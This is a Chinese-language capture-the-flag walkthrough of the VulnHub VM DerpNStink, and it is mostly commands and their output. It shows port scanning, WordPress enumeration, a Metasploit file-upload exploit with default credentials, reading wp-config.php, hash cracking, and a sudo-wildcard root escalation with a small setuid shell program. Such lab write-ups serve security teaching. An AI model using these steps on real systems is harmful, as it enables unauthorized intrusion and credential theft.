VM - DerpNStink 的破解

本文主要記錄對 Lazysysadmin 的滲透學習過程，測試的 VM 主機主要來源 www.vulnhub.com
部落格集：面向 CTF 的 VM 破解系列
下載連結：DerpNStink

1. 初始安裝的虛擬機器是不知道IP的，首先需要資訊收集發現IP，這裡使用 netdiscover

   Currently scanning: 192.168.141.0/16   |   Screen View: Unique Hosts                                                   
                                                                                                                           
    4 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 240                                                        
    _____________________________________________________________________________
      IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
    -----------------------------------------------------------------------------
    10.10.10.2      00:50:56:fb:16:b2      2     120  VMware, Inc.                                                         
    10.10.10.128    00:0c:29:48:44:79      2     120  VMware, Inc. 
   

2. 使用 nmap 進行埠探測

   Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 02:47 EST
   Nmap scan report for 10.10.10.128
   Host is up (0.00041s latency).
   Not shown: 997 closed ports
   PORT   STATE SERVICE VERSION
   21/tcp open  ftp     vsftpd 3.0.2
   22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
   | ssh-hostkey:
   |   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
   |   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
   |   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
   |_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
   80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
   | http-robots.txt: 2 disallowed entries
   |_/php/ /temporary/
   |_http-server-header: Apache/2.4.7 (Ubuntu)
   |_http-title: DeRPnStiNK
   MAC Address: 00:0C:29:48:44:79 (VMware)
   Device type: general purpose
   Running: Linux 3.X|4.X
   OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
   OS details: Linux 3.2 - 4.9
   Network Distance: 1 hop
   Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
   

3. 使用 nmap 掃描發現目標機器開啟了 80 埠，訪問主頁，檢視頁面原始碼發現flag1
   發現flag1：FLAG1（52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166）

4. 下一步使用 dirbuster 進行目錄爆破
   

5. 爆破發現 weblog 目錄，可以進行訪問。看到是 wordpress 網站
   

6. 使用 wpscan 來列舉 wordpress 主題、使用者和外掛

   root@kali:~# wpscan --enumerate at --enumerate ap --enumerate u --url http://10.10.10.128
   

   wpscan向我們展示了可利用的外掛

   我們還發現使用者名稱和密碼都是admin

7. 我們使用metasploit來利用此漏洞

   msf > use exploit/unix/webapp/wp_slideshowgallery_upload
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.1.102
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
   msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
   

   成功拿到 shell
   進入後臺檢視 wp-config.php 檔案中的資料庫賬號密碼

   meterpreter > pwd
   /var/www/html/weblog
   meterpreter > cat wp-config.php
   
   	/** MySQL database username */
   	define('DB_USER', 'root');
   	
   	/** MySQL database password */
   	define('DB_PASSWORD', 'mysql');
   

8. 由於前面使用 dirbuster 爆破出了 phpmyadmin 目錄，瀏覽器遠端連線可以看到 wordpress 的另一個賬號密碼
   使用 john the rapper 進行密碼的 hash 值暴破
   暴破出的密碼為 wedgie57

9. 使用暴破出的使用者名稱/密碼：unclestinky/wedgie57 登入 wordpress
   獲取的 flag2 為 flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

10. 檢視 /home 下的使用者列表檢視 /home 下的使用者列表
    
    使用 ssh 登入 stinky 發現只能使用金鑰登入

11. 在剛才的 meterpreter 中獲取 shell 嘗試登入 stinky/wedgie57

    meterpreter > shell
    Process 2685 created.
    Channel 2 created.
    python -c 'import pty;pty.spawn("/bin/sh")'
    $ su stinky
    su stinky
    Password: wedgie57
    
    stinky@DeRPnStiNK:/home$ ls
    ls
    mrderp  stinky
    stinky@DeRPnStiNK:/home$
    stinky@DeRPnStiNK:/home$ ls
    ls
    mrderp  stinky
    stinky@DeRPnStiNK:/home$ cd stinky
    cd stinky
    stinky@DeRPnStiNK:~$ ls
    ls
    Desktop  Documents  Downloads  ftp
    stinky@DeRPnStiNK:~$ cd Desktop
    cd Desktop
    stinky@DeRPnStiNK:~/Desktop$ ls
    ls
    flag.txt
    stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
    cat flag.txt
    flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
    
    

登入成功之後列舉系統可以發現 flag.txt 檔案。flag3：flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

12. 列舉系統發現 Documents 目錄中存在 derpissues.pcap 檔案

    stinky@DeRPnStiNK:~$ cd Documents
    cd Documents
    stinky@DeRPnStiNK:~/Documents$ ls
    ls
    derpissues.pcap
    

13. 使用 ftp 登入系統 stinky/wedgie57，下載pcap包
    發現 ftp 的根目錄是 files，切換 shell 的路徑到 files

    stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
    cat derpissues.txt
    12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
    12:07 stinky: yeah. did you need a password reset?
    12:07 mrderp: I think i accidently deleted my account
    12:07 mrderp: i just need to logon once to make a change
    12:07 stinky: im gonna packet capture so we can figure out whats going on
    12:07 mrderp: that seems a bit overkill, but wtv
    12:08 stinky: commence the sniffer!!!!
    12:08 mrderp: -_-
    12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
    12:11 mrderp: awesome it works!
    12:12 stinky: we really are the best sysadmins #team
    12:13 mrderp: i guess we are...
    12:15 mrderp: alright I made the changes, feel free to decomission my account
    12:20 stinky: done! yay
    

14. 將 derpissues.pcap 複製到 ftp 的根目錄以便於下載

    stinky@DeRPnStiNK:~/Documents$ cp derpissues.pcap /home/stinky/ftp/files
    cp derpissues.pcap /home/stinky/ftp/files
    

    下載 pcap 包
    在wireshark中開啟它並找到其他使用者的密碼
    另一個賬號的使用者名稱和密碼為： mrderp / derpderpderpderpderpderpderp

15. 使用 ssh 連線 mrderp
    登入之後列舉系統發現提示資訊
    之後 sudo 切換系統

    mrderp@DeRPnStiNK:~$ ls
    Desktop  Documents  Downloads
    mrderp@DeRPnStiNK:~$ sudo -l
    [sudo] password for mrderp: 
    Matching Defaults entries for mrderp on DeRPnStiNK:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User mrderp may run the following commands on DeRPnStiNK:
        (ALL) /home/mrderp/binaries/derpy*
    

    以上資訊 /home/mrderp/binaries/derpy* 中：binaries 目錄中的以 derpy 開頭的可執行檔案具有root許可權。建立檔案以提權

    mrderp@DeRPnStiNK:~$ mkdir binaries
    mrderp@DeRPnStiNK:~$ ls
    binaries  Desktop  Documents  Downloads
    mrderp@DeRPnStiNK:~$ cd binaries/
    mrderp@DeRPnStiNK:~/binaries$ cat derpy.c 
    	#include<stdio.h>
    	#include<stdlib.h>
    	#include<sys/types.h>
    	#include<unistd.h>
    	int main()
    	{
    		setuid(0);
    		system("/bin/bash");
    		return 0;
    	}
    mrderp@DeRPnStiNK:~/binaries$ gcc derpy.c -o derpy
    mrderp@DeRPnStiNK:~/binaries$ ls
    derpy  derpy.c  derpy.py  derpy.sh
    mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy 
    [sudo] password for mrderp: 
    root@DeRPnStiNK:~/binaries# id
    uid=0(root) gid=0(root) groups=0(root)
    

    或者使用如下方法：

    mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh 
    	#!/bin/bash
    	bash -i
    mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh 
    mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh 
    root@DeRPnStiNK:~/binaries# 
    

    獲取flag4：

    root@DeRPnStiNK:~/binaries# cd /root/Desktop/
    root@DeRPnStiNK:/root/Desktop# ls
    flag.txt
    root@DeRPnStiNK:/root/Desktop# cat flag.txt 
    flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
    Congrats on rooting my first VulnOS!
    Hit me up on twitter and let me know your thoughts!
    @securekomodo